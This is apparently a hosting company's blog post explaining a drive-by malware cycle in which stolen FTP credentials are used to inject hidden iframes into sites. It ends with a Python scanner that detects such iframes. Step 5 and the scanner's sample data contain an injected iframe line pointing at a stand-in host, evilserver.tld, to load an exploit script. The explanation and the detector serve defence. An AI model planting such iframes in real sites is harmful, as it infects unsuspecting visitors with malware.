Malware: intrusion cycle and processes

For a web design company, the worst nightmare is having your FTP credentials stolen and the few hundred sites you are hosting infected by malware of some sort.

Quite recently, one of the sites we were hosting was infected by malware, and everyone who opened that site was infected in turn by unknowingly downloading a small exploit script which stole FTP credentials and inserted a small iframe into each web site.

Here is some explanation of the cycle:

1. The life cycle begins with a zombie (the culprit) wanting FTP credentials!
2. Here you have some FTP credentials (taken from your computer: stored passwords, Firefox storage, IE storage):
   Username: User
   Password: stupidpassword
3. Our zombie tries to log in using the supplied FTP credentials.
4. If the login is successful,
5. he tries to inject malicious code (iframes) into .html/.php files that already exist on the victim server, e.g.:
   <iframe src=evilserver.tld/getexploits.php border=0>
6. An unsuspecting user (“poor-guy”) visits the site; he trusts it because he has used it many times before and never experienced any problems.
7. Poor-guy gets back the normal web content as usual, but this time “enriched” with an invisible iframe that points to the malicious domain evilserver.tld.
8. Poor-guy’s browser now downloads the script getexploits.php from evilserver.tld…
9. But this script getexploits.php is malicious and tries to exploit several well-known vulnerabilities in poor-guy’s browser or installed plugins…
10. If any of those attacks succeeds, poor-guy’s browser downloads a trojan from evilserver.tld which turns his computer into another zombie. This zombie can now watch poor-guy’s actions, steal his bank accounts, or install other drive-by infections as in step 1 – the zombie is under the control of the attacker.
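As an added example (not code from the original post), here is a small Python scanner a hosting admin could run over a site's files to find the frames injected in step 5: iframes pointing at a host other than the site's own, or hidden via border=0, 1x1 sizing or CSS. The sample file contents and the allow-list of the site's own hosts are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed sample site contents (not real files): one clean page, two with injected frames.
SAMPLE_FILES = {
    "index.html": '<h1>Welcome</h1><iframe src="https://www.example.com/map" width=600></iframe>',
    "about.php": "<?php include 'header.php'; ?><p>About us</p>"
                 "<iframe src=evilserver.tld/getexploits.php border=0></iframe>",
    "contact.html": "<p>Contact</p><iframe src='http://evilserver.tld/getexploits.php'"
                    " width=1 height=1 style='visibility: hidden'></iframe>",
}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def parse_attrs(raw):
    """Return the tag's attributes as a lowercase-keyed dict (quoted or bare values)."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}

def host_of(src):
    """Hostname of an iframe src; scheme-less values such as evilserver.tld/x.php count too."""
    if "://" not in src and not src.startswith("//"):
        src = "//" + src
    return (urlparse(src).hostname or "").lower()

def scan_file(name, content, allowed_hosts):
    """Flag iframes that point off-site and/or are hidden from the visitor."""
    findings = []
    for m in IFRAME_RE.finditer(content):
        attrs = parse_attrs(m.group(1))
        src, reasons = attrs.get("src", ""), []
        host = host_of(src)
        if host and host not in allowed_hosts:
            reasons.append("external host")
        if attrs.get("border") == "0":          # the border=0 trick from the post
            reasons.append("border=0")
        if attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1"):
            reasons.append("1x1 or smaller")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append({"file": name, "src": src, "host": host, "reasons": reasons})
    return findings

def scan_site(files, allowed_hosts):
    """Scan every filename -> content pair; returns the list of suspicious iframes."""
    return [f for n, c in files.items() for f in scan_file(n, c, allowed_hosts)]
```

Run it against the real document root by reading each .html/.php file into the dict, and compare results against a clean backup so a newly appeared off-site frame stands out.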


